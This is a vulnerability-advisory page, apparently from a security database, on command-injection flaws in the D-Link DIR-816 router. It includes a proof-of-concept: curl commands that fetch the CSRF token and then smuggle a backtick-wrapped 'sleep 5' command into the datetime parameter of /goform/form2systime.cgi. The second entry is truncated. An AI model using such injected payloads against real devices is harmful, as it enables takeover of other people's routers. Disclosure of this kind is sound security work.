D-Link DIR-816 多个漏洞 CVE-2018-17066, CVE-2018-17068, CVE-2018-17064, CVE-2018-17063, CVE-2018-17067, CVE-2018-17065

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### CVE-2018-17066: Command injection **Vul detail** In the handler of route /goform/form2systime.cgi, the value of parameter datetime is used in the construction of command date -s "%s", which is later fed to system: ![](https://images.seebug.org/1543479514847-w331s) So it could lead to command injection with crafted request. **POC** There's a random token required by the route, which is used as a mitigation against CSRF. So first we need to get its value: ``` TOKENID=`curl -s http://192.168.0.1/dir_login.asp | grep tokenid | head -1 | grep -o 'value="[0-9]*"' | cut -f 2 -d = | tr -d '"'` ``` Then we could send the crafted parameter along with the token to the route: ``` curl -i -X POST http://192.168.0.1/goform/form2systime.cgi -d tokenid=$TOKENID -d 'datetime=`sleep 5`-:' ``` ### CVE-2018-17068: Command injection **Vul detail** In the handler of route /goform/Diagnosis, the value of parameter sendNum is used in the construction of command ping -c %s ..., which is later fed to...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息